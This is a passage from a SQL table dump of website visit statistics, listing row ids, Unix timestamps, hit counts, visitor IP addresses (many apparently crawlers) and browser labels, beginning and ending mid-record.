hrome'),(566739,1670791635,1,0,1,0,'66.249.70.34',''),(566740,1670793842,1,1,0,0,'23.254.228.172','chrome'),(566741,1670794217,1,1,0,0,'189.203.106.12','other'),(566742,1670807258,1,1,0,0,'205.210.31.131','other'),(566743,1670816699,1,1,0,0,'198.235.24.166','other'),(566744,1670817170,1,1,0,0,'198.235.24.143','other'),(566745,1670823186,1,1,0,0,'194.38.20.161','other'),(566746,1670833569,1,1,0,0,'205.210.31.148','other'),(566747,1670840590,1,0,1,0,'66.249.70.34',''),(566748,1670840680,1,1,0,0,'66.249.70.34','chrome'),(566749,1670869299,1,1,0,0,'87.250.224.194','other'),(566750,1670874614,1,0,1,0,'66.249.70.37',''),(566752,1670878040,1,0,1,0,'66.249.70.37',''),(566753,1670889735,6,6,0,0,'5.45.207.95','chrome'),(566754,1670889818,1,1,0,0,'5.45.207.95','other'),(566755,1670889820,1,1,0,0,'87.250.224.44','other'),(566756,1670889837,3,3,0,0,'87.250.224.44','chrome'),(566757,1670889918,1,1,0,0,'5.45.207.110','other'),(566758,1670889933,1,1,0,0,'87.250.224.183','chrome'),(566759,1670889934,1,1,0,0,'87.250.224.16','other'),(566760,1670904934,1,0,1,0,'66.249.70.37',''),(566761,1670905529,2,2,0,0,'205.169.39.225','chrome'),(566762,1670917786,1,1,0,0,'205.210.31.132','other'),(566763,1670949855,1,1,0,0,'194.38.20.161','other'),(566764,1670950665,1,1,0,0,'5.45.207.95','chrome'),(566765,1670956753,1,1,0,0,'66.249.69.41','chrome'),(566766,1670956811,1,1,0,0,'66.249.69.37','chrome'),(566767,1670959001,1,1,0,0,'66.249.69.39','chrome'),(566768,1670961159,1,0,1,0,'66.249.69.39',''),(566769,1670964497,1,0,1,0,'66.249.69.37',''),(566770,1670965407,1,1,0,0,'198.235.24.156','other'),(566771,1670966925,1,0,1,0,'66.249.69.41',''),(566772,1670969592,5,5,0,0,'3.136.25.201','chrome'),(566773,1670971076,5,5,0,0,'142.54.224.196','chrome'),(566774,1670981520,1,0,1,0,'66.249.69.41',''),(566775,1670990981,1,1,0,0,'66.249.69.39','chrome'),(566776,1670995708,1,1,0,0,'66.249.69.37','chrome'),(566777,1670997683,1,1,0,0,'66.249.69.41','chrome'),(566778,1670998976,2,2,0,0,'66.249.69.41','chrome'),(566779,1670999870,1,1,0,0,'66.249.69.37','chrome'),(566780,1671000676,1,1,0,0,'66.249.69.39','chrome'),(566781,1671010884,1,1,0,0,'66.249.69.37','chrome'),(566782,1671010984,1,1,0,0,'18.237.67.213','chrome'),(566783,1671011021,1,1,0,0,'54.202.204.126','chrome'),(566784,1671011027,1,1,0,0,'35.87.84.14','chrome'),(566785,1671011121,1,1,0,0,'34.212.198.220','chrome'),(566786,1671011195,1,1,0,0,'35.92.121.31','chrome'),(566787,1671012010,2,2,0,0,'35.89.82.142','chrome'),(566788,1671012117,2,2,0,0,'34.219.34.122','chrome'),(566789,1671013078,1,1,0,0,'31.13.127.4','other'),(566790,1671021444,1,1,0,0,'66.249.70.37','chrome'),(566791,1671031069,1,0,1,0,'66.249.70.37',''),(566792,1671031340,1,0,1,0,'66.249.70.34',''),(566793,1671034699,1,0,1,0,'66.249.70.37',''),(566794,1671035005,1,0,1,0,'66.249.70.63',''),(566795,1671038764,1,1,0,0,'66.249.70.63','chrome'),(566796,1671049088,1,1,0,0,'83.150.215.90','firefox'),(566797,1671050069,2,1,1,0,'66.249.70.63',''),(566798,1671056257,2,2,0,0,'45.61.188.225','chrome'),(566799,1671074908,1,1,0,0,'66.249.70.63','chrome'),(566800,1671079269,1,1,0,0,'143.198.8.72','other'),(566801,1671084715,1,1,0,0,'159.65.250.78','other'),(566802,1671085405,1,1,0,0,'66.249.70.34','chrome'),(566803,1671086635,1,1,0,0,'194.38.20.161','other'),(566804,1671088452,1,1,0,0,'87.250.224.177','chrome'),(566805,1671088711,1,1,0,0,'69.171.249.120','other'),(566806,1671091863,1,1,0,0,'68.69.184.202','other'),(566807,1671097568,1,1,0,0,'5.255.253.176','chrome'),(566808,1671113553,1,1,0,0,'66.249.70.37','chrome'),(566809,1671115321,1,1,0,0,'43.135.164.103','chrome'),(566810,1671116821,1,1,0,0,'185.181.60.12','chrome'),(566811,1671125227,1,1,0,0,'95.79.139.49','chrome'),(566812,1671126483,1,1,0,0,'95.108.213.73','chrome'),(566813,1671132409,1,1,0,0,'95.79.139.49','chrome'),(566814,1671137290,1,0,1,0,'66.249.70.34',''),(566815,1671140357,1,1,0,0,'207.46.13.189','chrome'),(566816,1671142581,1,1,0,0,'66.249.70.34','chrome'),(566817,1671142589,1,0,1,0,'66.249.70.63',''),(566818,1671164125,1,1,0,0,'66.249.70.63','chrome'),(566819,1671164128,1,0,1,0,'66.249.70.34',''),(566820,1671165035,1,0,1,0,'66.249.70.34',''),(566821,1671165096,2,1,1,0,'66.249.70.34',''),(566822,1671166917,1,1,0,0,'205.210.31.138','other'),(566823,1671168352,1,1,0,0,'5.255.253.118','chrome'),(566824,1671170305,2,2,0,0,'66.249.70.63','chrome'),(566825,1671170403,1,0,1,0,'66.249.70.34',''),(566826,1671171449,1,1,0,0,'31.13.127.10','other'),(566827,1671171450,1,1,0,0,'31.13.127.23','other'),(566828,1671171453,1,1,0,0,'31.13.103.19','other'),(566829,1671171841,1,1,0,0,'207.46.13.72','chrome'),(566830,1671173486,3,3,0,0,'147.78.47.249','chrome'),(566831,1671190039,1,1,0,0,'68.69.184.202','other'),(566832,1671201122,10,10,0,0,'81.0.219.240','chrome'),(566833,1671223682,1,0,1,0,'66.249.70.63',''),(566834,1671236945,2,2,0,0,'95.108.213.8','other'),(566835,1671243439,1,1,0,0,'173.252.83.12','other'),(566836,1671243691,1,1,0,0,'87.236.176.156','other'),(566837,1671243694,1,1,0,0,'87.236.176.218','chrome'),(566838,1671243696,1,1,0,0,'157.245.216.203','chrome'),(566839,1671254193,1,1,0,0,'64.246.165.50','firefox'),(566840,1671256156,1,1,0,0,'194.38.20.161','other'),(566841,1671256361,1,1,0,0,'205.210.31.5','other'),(566842,1671257358,1,1,0,0,'162.0.208.95','firefox'),(566843,1671272984,1,1,0,0,'66.249.70.63','chrome'),(566844,1671294872,1,1,0,0,'205.210.31.59','other'),(566845,1671303128,1,1,0,0,'205.210.31.159','other'),(566846,1671310108,1,0,1,0,'66.249.70.37',''),(566847,1671317321,1,0,1,0,'66.249.70.37',''),(566848,1671349800,10,10,0,0,'5.189.172.220','chrome'),(566849,1671364098,1,1,0,0,'87.250.224.122','other'),(566850,1671368591,1,1,0,0,'31.13.127.113','other'),(566851,1671368763,1,1,0,0,'198.235.24.27','other'),(566852,1671371548,3,3,0,0,'147.78.47.249','chrome'),(566853,1671379250,1,1,0,0,'87.250.224.182','chrome'),(566854,1671389244,1,1,0,0,'66.249.66.83','chrome'),(566855,1671396776,1,0,1,0,'66.249.66.84',''),(566856,1671400768,1,1,0,0,'205.210.31.136','other'),(566857,1671402868,1,1,0,0,'74.84.150.150','other'),(566858,1671421373,1,1,0,0,'194.38.20.161','other'),(566859,1671427738,1,1,0,0,'66.249.66.61','chrome'),(566860,1671433436,1,1,0,0,'38.242.241.9','firefox'),(566861,1671435186,1,0,1,0,'66.249.66.61',''),(566862,1671438946,1,1,0,0,'173.252.111.7','other'),(566863,1671438984,1,1,0,0,'66.249.66.61','chrome'),(566864,1671442733,1,1,0,0,'66.249.66.59','chrome'),(566865,1671480788,1,1,0,0,'87.236.176.105','other'),(566866,1671480791,1,1,0,0,'87.236.176.234','chrome'),(566867,1671480792,1,1,0,0,'104.248.203.191','chrome'),(566868,1671482943,1,0,1,0,'66.249.70.63',''),(566869,1671491727,1,1,0,0,'66.249.70.34','chrome'),(566870,1671493423,1,1,0,0,'20.207.204.69','other'),(566871,1671500143,1,1,0,0,'66.249.70.63','chrome'),(566872,1671553921,1,1,0,0,'197.155.158.21','chrome'),(566873,1671555446,3,3,0,0,'149.56.160.161','other'),(566874,1671555462,1,1,0,0,'149.56.160.161','chrome'),(566875,1671555481,1,1,0,0,'149.56.150.46','other'),(566876,1671565618,1,1,0,0,'69.171.249.118','other'),(566877,1671569336,1,0,1,0,'66.249.70.63',''),(566878,1671579217,1,1,0,0,'20.207.204.69','other'),(566879,1671591080,5,5,0,0,'137.184.59.77','chrome'),(566880,1671592141,1,1,0,0,'128.199.240.85','chrome'),(566881,1671592583,5,5,0,0,'3.17.163.3','chrome'),(566882,1671608395,1,1,0,0,'194.38.20.161','other'),(566883,1671611255,1,1,0,0,'157.55.39.95','other'),(566884,1671616604,1,1,0,0,'20.207.204.69','other'),(566885,1671626939,1,1,0,0,'207.46.13.195','other'),(566886,1671654173,1,0,1,0,'66.249.66.57',''),(566887,1671698956,2,2,0,0,'183.136.225.46','firefox'),(566888,1671723665,1,1,0,0,'85.163.80.240','other'),(566889,1671723816,1,1,0,0,'66.249.70.37','chrome'),(566890,1671740396,1,0,1,0,'66.249.70.37',''),(566891,1671740607,1,1,0,0,'194.44.232.208','chrome'),(566892,1671744107,1,1,0,0,'194.38.20.161','other'),(566893,1671744634,1,1,0,0,'78.47.80.222','chrome'),(566894,1671756286,1,1,0,0,'207.46.13.186','chrome'),(566895,1671757915,1,1,0,0,'198.235.24.139','other'),(566896,1671762389,1,1,0,0,'173.252.83.13','other'),(566897,1671764403,1,1,0,0,'147.182.132.94','chrome'),(566898,1671764404,1,1,0,0,'147.182.132.94','firefox'),(566899,1671796543,1,1,0,0,'198.235.24.43','other'),(566900,1671800002,2,2,0,0,'31.13.127.1','other'),(566901,1671800040,1,1,0,0,'31.13.127.24','other'),(566902,1671800047,1,1,0,0,'31.13.127.15','other'),(566903,1671800065,1,1,0,0,'31.13.127.14','other'),(566904,1671800073,1,1,0,0,'31.13.127.117','other'),(566905,1671800085,1,1,0,0,'31.13.127.7','other'),(566906,1671800086,1,1,0,0,'31.13.127.25','other'),(566907,1671802399,1,1,0,0,'66.249.66.82','chrome'),(566908,1671816755,1,1,0,0,'95.108.213.115','other'),(566909,1671826808,1,0,1,0,'66.249.66.129',''),(566910,1671842268,1,1,0,0,'35.84.195.208','chrome'),(566911,1671842431,1,1,0,0,'198.235.24.29','other'),(566912,1671842729,1,1,0,0,'207.46.13.214','chrome'),(566913,1671849469,1,1,0,0,'205.210.31.24','other'),(566914,1671864857,1,1,0,0,'207.46.13.186','chrome'),(566915,1671865332,1,1,0,0,'194.38.20.161','other'),(566916,1671873280,1,1,0,0,'198.235.24.175','other'),(566917,1671877717,4,4,0,0,'159.242.234.211','chrome'),(566919,1671906800,1,1,0,0,'66.249.66.209','chrome'),(566920,1671906886,1,0,1,0,'66.249.66.9',''),(566921,1671909306,1,1,0,0,'185.237.217.11','chrome'),(566922,1671909653,1,1,0,0,'87.250.224.220','other'),(566923,1671909674,1,1,0,0,'213.180.203.185','other'),(566924,1671910251,3,3,0,0,'185.237.217.11','chrome'),(566925,1671913219,1,0,1,0,'66.249.66.61',''),(566926,1671916286,1,1,0,0,'74.84.150.150','other'),(566927,1671924668,1,1,0,0,'167.99.72.125','firefox'),(566928,1671926919,1,1,0,0,'207.46.13.31','chrome'),(566929,1671933850,1,1,0,0,'109.239.58.107','chrome'),(566930,1671935442,1,1,0,0,'66.249.66.59','chrome'),(566931,1671935682,1,0,1,0,'66.249.66.207',''),(566932,1671952923,1,1,0,0,'92.118.76.184','other'),(566933,1671954724,1,1,0,0,'205.210.31.164','other'),(566934,1671960785,1,1,0,0,'46.211.76.78','chrome'),(566935,1671964774,4,4,0,0,'109.70.108.10','chrome'),(566936,1671974989,2,2,0,0,'46.211.91.248','chrome'),(566937,1671987439,1,1,0,0,'66.249.66.158','chrome'),(566938,1671989283,4,4,0,0,'171.22.28.11','chrome'),(566939,1671997852,1,0,1,0,'66.249.66.158',''),(566940,1672008124,1,1,0,0,'5.161.183.84','chrome'),(566941,1672020876,1,1,0,0,'207.46.13.186','chrome'),(566942,1672029470,2,2,0,0,'20.120.14.212','chrome'),(566944,1672034061,1,1,0,0,'31.13.127.3','other'),(566945,1672042293,1,1,0,0,'66.249.66.59','chrome'),(566946,1672044130,1,1,0,0,'66.249.66.61','chrome'),(566947,1672044236,1,1,0,0,'66.249.66.59','chrome'),(566948,1672047470,1,1,0,0,'157.55.39.190','chrome'),(566949,1672048242,1,1,0,0,'54.184.47.61','chrome'),(566950,1672048273,2,2,0,0,'35.87.252.227','chrome'),(566951,1672050563,1,1,0,0,'85.128.143.58','other'),(566952,1672051522,1,1,0,0,'91.196.178.36','chrome'),(566953,1672081598,1,1,0,0,'207.46.13.31','chrome'),(566954,1672083216,1,0,1,0,'66.249.70.41',''),(566955,1672083239,1,1,0,0,'66.249.70.39','chrome'),(566956,1672084300,1,0,1,0,'66.249.70.37',''),(566957,1672085512,1,1,0,0,'205.210.31.57','other'),(566958,1672096542,1,1,0,0,'198.98.48.183','chrome'),(566959,1672127092,1,1,0,0,'66.249.70.41','chrome'),(566960,1672141985,1,1,0,0,'207.154.198.162','chrome'),(566961,1672163099,1,1,0,0,'31.13.127.12','other'),(566962,1672169338,1,1,0,0,'198.98.48.183','chrome'),(566963,1672170409,1,0,1,0,'66.249.66.83',''),(566964,1672171527,1,0,1,0,'66.249.66.61',''),(566965,1672171537,1,1,0,0,'199.244.88.226','chrome'),(566966,1672178803,1,1,0,0,'66.249.66.83','chrome'),(566967,1672184564,1,1,0,0,'157.55.39.190','other'),(566968,1672193662,1,1,0,0,'205.210.31.49','other'),(566969,1672197420,1,1,0,0,'157.55.39.190','other'),(566970,1672202454,1,1,0,0,'207.46.13.186','other'),(566971,1672203014,1,1,0,0,'207.46.13.31','chrome'),(566972,1672203702,1,1,0,0,'51.158.98.24','other'),(566973,1672207338,1,1,0,0,'194.38.20.161','other'),(566974,1672208113,1,1,0,0,'46.211.111.104','chrome'),(566975,1672208578,1,1,0,0,'5.45.207.145','other'),(566976,1672211318,1,1,0,0,'66.249.66.59','chrome'),(566977,1672214016,1,1,0,0,'31.129.248.16','chrome'),(566978,1672227181,1,1,0,0,'66.249.70.39','chrome'),(566979,1672228735,1,1,0,0,'66.249.70.39','chrome'),(566980,1672230959,1,1,0,0,'5.45.207.117','chrome'),(566981,1672239236,1,0,1,0,'66.249.70.39',''),(566982,1672253689,1,1,0,0,'66.249.70.41','chrome'),(566983,1672257223,1,0,1,0,'66.249.70.41',''),(566984,1672272145,3,3,0,0,'147.78.47.249','chrome'),(566985,1672274091,1,1,0,0,'194.163.132.194','firefox'),(566986,1672301150,1,1,0,0,'20.83.31.114','chrome'),(566987,1672306174,1,1,0,0,'52.88.208.143','chrome'),(566988,1672306176,1,1,0,0,'35.89.101.111','chrome'),(566989,1672306217,1,1,0,0,'34.211.47.110','chrome'),(566990,1672306456,2,2,0,0,'34.219.176.147','chrome'),(566991,1672312113,1,1,0,0,'66.249.70.37','chrome'),(566992,1672315282,1,1,0,0,'66.249.70.39','chrome'),(566993,1672316428,1,1,0,0,'91.196.178.35','chrome'),(566994,1672317791,1,1,0,0,'66.249.70.37','chrome'),(566995,1672326024,1,1,0,0,'194.38.20.161','other'),(566996,1672332050,1,1,0,0,'207.46.13.111','other'),(566997,1672332619,1,1,0,0,'66.249.70.41','chrome'),(566998,1672342239,1,1,0,0,'87.250.224.101','other'),(566999,1672342334,1,1,0,0,'5.45.207.132','other'),(567000,1672342517,1,1,0,0,'167.99.72.125','firefox'),(567001,1672343516,1,0,1,0,'66.249.70.41',''),(567002,1672365566,1,1,0,0,'198.235.24.129','other'),(567003,1672380756,2,2,0,0,'91.235.225.28','chrome'),(567004,1672389374,1,1,0,0,'66.249.70.39','chrome'),(567005,1672393048,1,1,0,0,'52.12.207.228','chrome'),(567006,1672393085,1,1,0,0,'54.202.183.33','chrome'),(567007,1672393124,2,2,0,0,'35.91.142.196','chrome'),(567008,1672400450,1,1,0,0,'31.13.127.19','other'),(567009,1672401735,1,1,0,0,'173.252.83.8','other'),(567010,1672415393,1,1,0,0,'66.249.66.83','chrome'),(567011,1672428226,1,1,0,0,'157.55.39.36','other'),(567012,1672429916,1,0,1,0,'66.249.66.5',''),(567013,1672434386,1,1,0,0,'91.196.178.208','chrome'),(567014,1672435665,5,5,0,0,'128.199.26.42','chrome'),(567015,1672438542,3,3,0,0,'147.78.47.249','chrome'),(567016,1672442570,1,1,0,0,'157.55.39.190','other'),(567017,1672456787,1,1,0,0,'157.55.39.190','other'),(567018,1672471261,1,1,0,0,'194.38.20.161','other'),(567019,1672474556,1,1,0,0,'205.210.31.136','other'),(567020,1672494121,1,1,0,0,'157.55.39.190','other'),(567021,1672514682,1,1,0,0,'164.92.117.248','firefox'),(567022,1672516327,1,0,1,0,'66.249.70.41',''),(567023,1672525908,1,1,0,0,'146.190.49.55','firefox'),(567024,1672534000,1,1,0,0,'205.210.31.162','other'),(567025,1672558416,1,1,0,0,'66.249.70.37','chrome'),(567026,1672585454,1,1,0,0,'207.46.13.111','chrome'),(567027,1672596204,1,1,0,0,'69.171.249.4','other'),(567028,1672597293,1,1,0,0,'66.249.70.39','chrome'),(567029,1672600766,1,1,0,0,'66.249.70.41','chrome'),(567030,1672601369,1,0,1,0,'66.249.70.39',''),(567031,1672606401,1,1,0,0,'198.235.24.28','other'),(567032,1672611793,1,1,0,0,'66.249.70.37','chrome'),(567033,1672613275,1,1,0,0,'66.249.70.41','chrome'),(567034,1672616192,1,1,0,0,'66.249.70.37','chrome'),(567035,1672619551,1,1,0,0,'66.249.70.41','chrome'),(567036,1672622272,1,1,0,0,'198.235.24.142','other'),(567037,1672627576,1,1,0,0,'66.249.70.39','chrome'),(567038,1672630601,1,1,0,0,'66.249.70.37','chrome'),(567039,1672633725,1,1,0,0,'194.38.20.161','other'),(567040,1672634934,1,1,0,0,'66.249.70.39','chrome'),(567041,1672647388,1,1,0,0,'66.249.70.39','chrome'),(567042,1672648023,1,1,0,0,'128.199.21.138','firefox'),(567043,1672652561,1,1,0,0,'66.249.70.39','chrome'),(567044,1672653485,1,1,0,0,'74.84.150.150','other'),(567045,1672656576,1,1,0,0,'66.249.70.39','chrome'),(567046,1672669776,1,1,0,0,'91.196.178.169','chrome'),(567047,1672679557,1,1,0,0,'87.250.224.122','chrome'),(567048,1672681769,1,1,0,0,'66.249.70.39','chrome'),(567049,1672683282,1,1,0,0,'207.46.13.31','other'),(567050,1672687416,1,0,1,0,'66.249.70.37',''),(567051,1672688618,1,1,0,0,'95.79.173.212','firefox'),(567052,1672749147,1,1,0,0,'178.133.29.113','chrome'),(567053,1672751763,1,1,0,0,'198.235.24.175','other'),(567054,1672754794,1,1,0,0,'185.154.54.2','chrome'),(567055,1672754795,1,1,0,0,'185.154.54.2','other'),(567056,1672757596,1,1,0,0,'207.46.13.111','other'),(567057,1672762456,1,1,0,0,'194.38.20.161','other'),(567058,1672773842,1,0,1,0,'66.249.70.41',''),(567059,1672774865,1,1,0,0,'173.252.107.20','other'),(567060,1672774904,1,1,0,0,'173.252.107.10','other'),(567061,1672775973,1,1,0,0,'184.94.240.88','firefox'),(567062,1672780435,1,0,1,0,'66.249.70.37',''),(567063,1672784551,5,5,0,0,'3.135.192.51','chrome'),(567064,1672790008,1,1,0,0,'65.21.206.46','chrome'),(567065,1672794811,1,1,0,0,'199.244.88.218','chrome'),(567066,1672810723,1,1,0,0,'198.235.24.151','other'),(567067,1672834932,1,1,0,0,'207.46.13.172','chrome'),(567068,1672841464,1,1,0,0,'148.72.209.0','firefox'),(567069,1672842780,1,1,0,0,'64.246.187.42','firefox'),(567070,1672854667,1,1,0,0,'207.46.13.3','chrome'),(567071,1672860303,1,0,1,0,'66.249.70.41',''),(567072,1672862787,1,1,0,0,'68.69.184.202','other'),(567073,1672867842,1,1,0,0,'194.169.175.39','other'),(567074,1672879949,1,1,0,0,'207.46.13.3','chrome'),(567075,1672881617,14,14,0,0,'54.193.92.57','firefox'),(567076,1672885663,1,1,0,0,'194.38.20.161','other'),(567077,1672890501,2,2,0,0,'54.193.92.57','firefox'),(567078,1672911784,1,1,0,0,'34.220.28.66','chrome'),(567079,1672911789,1,1,0,0,'54.202.20.113','chrome'),(567080,1672911825,2,2,0,0,'54.201.20.213','chrome'),(567081,1672912400,2,2,0,0,'34.208.163.178','chrome'),(567082,1672919125,1,1,0,0,'172.177.202.205','other'),(567083,1672925011,1,1,0,0,'31.13.103.22','other'),(567084,1672934735,1,1,0,0,'51.158.108.61','other'),(567085,1672937843,1,1,0,0,'87.250.224.8','other'),(567086,1672940524,1,1,0,0,'207.46.13.3','chrome'),(567087,1672947503,1,1,0,0,'87.250.224.61','other'),(567088,1672951541,1,1,0,0,'114.119.157.118','other'),(567089,1672957546,1,1,0,0,'207.46.13.172','other'),(567090,1672965462,1,1,0,0,'66.249.66.209','chrome'),(567091,1672978035,1,1,0,0,'172.177.202.205','other'),(567092,1672983626,3,3,0,0,'147.78.47.249','chrome'),(567093,1672998225,2,2,0,0,'37.48.41.27','chrome'),(567094,1673008296,1,0,1,0,'66.249.70.59',''),(567095,1673009541,1,1,0,0,'198.235.24.141','other'),(567096,1673010785,1,1,0,0,'66.249.70.61','chrome'),(567097,1673014700,1,1,0,0,'173.252.83.2','other'),(567098,1673029909,1,1,0,0,'66.249.70.61','chrome'),(567099,1673054672,1,0,1,0,'66.249.70.61',''),(567100,1673055638,1,0,1,0,'66.249.70.37',''),(567101,1673067083,1,1,0,0,'194.38.20.161','other'),(567102,1673076791,1,1,0,0,'205.210.31.129','other'),(567103,1673080805,1,1,0,0,'205.210.31.163','other'),(567104,1673093250,1,1,0,0,'207.46.13.31','other'),(567105,1673094290,1,0,1,0,'66.249.70.41',''),(567106,1673100037,1,1,0,0,'205.210.31.60','other'),(567107,1673101425,2,2,0,0,'183.136.225.45','firefox'),(567108,1673101541,1,1,0,0,'183.136.225.45','chrome'),(567109,1673114889,1,1,0,0,'129.232.138.200','firefox'),(567110,1673122731,1,1,0,0,'207.46.13.93','chrome'),(567111,1673124418,1,1,0,0,'87.236.176.216','other'),(567112,1673124420,1,1,0,0,'87.236.176.192','chrome'),(567113,1673124421,1,1,0,0,'209.97.152.248','chrome'),(567114,1673124424,1,1,0,0,'23.129.64.132','chrome'),(567115,1673130520,1,1,0,0,'205.210.31.165','other'),(567116,1673139290,1,0,1,0,'66.249.70.41',''),(567117,1673148461,1,1,0,0,'66.249.70.41','chrome'),(567118,1673148634,1,0,1,0,'66.249.70.37',''),(567119,1673149323,1,1,0,0,'205.210.31.53','other'),(567120,1673152565,1,1,0,0,'66.249.70.37','chrome'),(567121,1673161030,1,1,0,0,'31.13.127.23','other'),(567122,1673162098,1,0,1,0,'66.249.70.37',''),(567123,1673172128,1,1,0,0,'66.249.70.41','chrome'),(567124,1673176126,1,1,0,0,'66.249.70.41','chrome'),(567125,1673180774,1,0,1,0,'66.249.66.61',''),(567126,1673187149,1,1,0,0,'149.18.60.148','other'),(567127,1673188698,2,2,0,0,'46.211.255.57','chrome'),(567128,1673194819,1,1,0,0,'66.249.66.9','chrome'),(567129,1673194916,1,1,0,0,'66.249.66.61','chrome'),(567130,1673194930,1,1,0,0,'66.249.66.209','chrome'),(567131,1673201505,1,1,0,0,'66.249.66.209','chrome'),(567132,1673203759,1,0,1,0,'66.249.66.9',''),(567133,1673221288,10,10,0,0,'66.94.99.113','chrome'),(567134,1673222016,1,1,0,0,'165.227.78.89','other'),(567135,1673224088,18,18,0,0,'64.225.56.232','chrome'),(567136,1673225721,1,0,1,0,'66.249.66.159',''),(567137,1673227055,1,1,0,0,'159.203.104.122','other'),(567138,1673228885,4,4,0,0,'35.206.76.17','chrome'),(567139,1673231763,1,1,0,0,'172.177.202.205','other'),(567140,1673236417,1,1,0,0,'194.38.20.161','other'),(567141,1673244900,1,0,1,0,'66.249.66.61',''),(567142,1673249132,1,1,0,0,'207.46.13.111','other'),(567143,1673258017,1,1,0,0,'18.236.104.158','chrome'),(567144,1673258019,1,1,0,0,'52.35.165.30','chrome'),(567145,1673258064,1,1,0,0,'18.236.236.139','chrome'),(567146,1673267118,1,0,1,0,'66.249.70.37',''),(567147,1673267753,1,1,0,0,'31.144.77.99','chrome'),(567148,1673271365,1,1,0,0,'88.155.8.14','chrome'),(567149,1673279638,1,1,0,0,'66.249.70.41','chrome'),(567150,1673281778,1,1,0,0,'162.241.152.79','firefox'),(567151,1673283165,1,1,0,0,'66.249.70.41','chrome'),(567152,1673283205,1,0,1,0,'66.249.70.39',''),(567153,1673293752,10,10,0,0,'144.126.151.207','chrome'),(567154,1673299501,1,0,1,0,'66.249.70.39',''),(567155,1673299537,1,1,0,0,'66.249.70.37','chrome'),(567156,1673304114,1,1,0,0,'173.252.107.118','other'),(567157,1673304115,1,1,0,0,'173.252.107.12','other'),(567158,1673304116,1,1,0,0,'173.252.107.18','other'),(567159,1673304118,1,1,0,0,'173.252.107.116','other'),(567160,1673308973,5,5,0,0,'64.227.184.83','chrome'),(567161,1673309557,1,1,0,0,'66.249.70.39','chrome'),(567162,1673310330,1,0,1,0,'66.249.70.41',''),(567163,1673312246,1,1,0,0,'157.55.39.201','chrome'),(567164,1673317383,1,0,1,0,'66.249.70.41',''),(567165,1673320049,1,1,0,0,'87.250.224.192','other'),(567166,1673325507,1,1,0,0,'66.249.70.59','chrome'),(567167,1673331897,1,1,0,0,'66.249.70.37','chrome'),(567168,1673336082,1,1,0,0,'198.235.24.25','other'),(567169,1673351782,1,0,1,0,'66.249.70.59',''),(567170,1673360389,1,1,0,0,'194.38.20.161','other'),(567171,1673366630,1,1,0,0,'205.210.31.153','other'),(567172,1673372557,1,1,0,0,'163.172.148.199','other'),(567173,1673374839,1,1,0,0,'31.13.127.28','other'),(567174,1673379744,1,1,0,0,'91.196.178.200','chrome'),(567175,1673379745,1,1,0,0,'66.102.9.170','chrome'),(567176,1673379793,1,1,0,0,'87.236.176.139','other'),(567177,1673379796,1,1,0,0,'87.236.176.10','chrome'),(567178,1673379799,1,1,0,0,'142.93.191.98','chrome'),(567179,1673379803,1,1,0,0,'179.43.159.197','chrome'),(567180,1673388148,1,1,0,0,'5.45.207.153','chrome'),(567181,1673388865,1,1,0,0,'66.249.70.41','chrome'),(567182,1673392007,1,1,0,0,'66.249.70.37','chrome'),(567183,1673394976,1,0,1,0,'66.249.70.41',''),(567184,1673395788,1,1,0,0,'149.18.60.148','other'),(567185,1673403265,5,5,0,0,'3.131.13.43','chrome'),(567186,1673422931,1,1,0,0,'66.249.70.37','chrome'),(567187,1673426626,1,1,0,0,'66.249.70.39','chrome'),(567188,1673437237,1,0,1,0,'66.249.70.41',''),(567189,1673438759,1,0,1,0,'66.249.70.41',''),(567190,1673440228,1,1,0,0,'66.249.66.209','chrome'),(567191,1673441753,1,0,1,0,'66.249.66.9',''),(567192,1673441958,1,1,0,0,'31.13.127.2','other'),(567193,1673441959,1,1,0,0,'31.13.127.20','other'),(567195,1673442977,1,0,1,0,'66.249.66.37',''),(567196,1673446617,1,1,0,0,'87.236.176.201','other'),(567197,1673446619,1,1,0,0,'87.236.176.190','chrome'),(567198,1673446620,1,1,0,0,'104.248.204.195','chrome'),(567199,1673457801,1,0,1,0,'66.249.66.84',''),(567200,1673457897,1,1,0,0,'66.249.66.158','chrome'),(567201,1673460780,1,1,0,0,'66.249.66.5','chrome'),(567202,1673460912,1,1,0,0,'49.51.134.238','firefox'),(567203,1673470752,1,1,0,0,'66.249.66.84','chrome'),(567204,1673470977,1,0,1,0,'66.249.66.159',''),(567205,1673472305,1,1,0,0,'149.18.60.148','other'),(567206,1673474634,1,1,0,0,'157.55.39.151','other'),(567207,1673481387,1,0,1,0,'66.249.66.84',''),(567208,1673486801,1,1,0,0,'194.38.20.161','other'),(567209,1673491811,1,1,0,0,'199.244.88.227','chrome'),(567210,1673506558,1,1,0,0,'194.169.175.39','other'),(567211,1673516649,1,1,0,0,'34.216.75.119','chrome'),(567212,1673516650,1,1,0,0,'54.214.79.141','chrome'),(567213,1673516987,2,2,0,0,'54.218.106.73','chrome'),(567214,1673524799,1,0,1,0,'66.249.66.34',''),(567215,1673555027,1,1,0,0,'46.35.252.130','chrome'),(567216,1673564721,1,1,0,0,'66.249.66.7','chrome'),(567217,1673566011,1,0,1,0,'66.249.66.37',''),(567218,1673571931,1,0,1,0,'66.249.66.34',''),(567219,1673571967,1,1,0,0,'66.249.66.9','chrome'),(567220,1673573098,1,1,0,0,'198.235.24.166','other'),(567221,1673581512,1,1,0,0,'194.113.194.13','chrome'),(567222,1673582692,2,2,0,0,'51.83.105.120','chrome'),(567223,1673582801,1,1,0,0,'79.137.65.46','firefox'),(567224,1673591757,1,1,0,0,'87.250.224.183','other'),(567225,1673605343,1,1,0,0,'91.107.142.252','chrome'),(567226,1673605817,1,1,0,0,'31.13.127.23','other'),(567227,1673611079,1,0,1,0,'66.249.66.34',''),(567228,1673611607,1,1,0,0,'88.103.249.114','firefox'),(567229,1673616410,1,1,0,0,'185.181.60.12','chrome'),(567230,1673621499,1,1,0,0,'173.252.83.24','other'),(567231,1673622007,1,1,0,0,'157.55.39.201','other'),(567232,1673624423,1,1,0,0,'149.18.60.148','other'),(567233,1673626602,1,1,0,0,'194.38.20.161','other'),(567234,1673629782,1,1,0,0,'66.249.66.63','chrome'),(567235,1673629828,1,0,1,0,'66.249.66.158',''),(567236,1673629829,1,1,0,0,'66.249.66.82','chrome'),(567237,1673652570,1,0,1,0,'66.249.66.63',''),(567238,1673654652,1,0,1,0,'66.249.66.7',''),(567239,1673654797,1,1,0,0,'66.249.66.7','chrome'),(567240,1673656547,1,1,0,0,'116.203.223.117','chrome'),(567241,1673659354,1,1,0,0,'5.45.207.117','other'),(567242,1673659430,1,1,0,0,'5.255.253.161','other'),(567243,1673677278,1,0,1,0,'66.249.66.34',''),(567244,1673677751,1,0,1,0,'66.249.66.63',''),(567245,1673681069,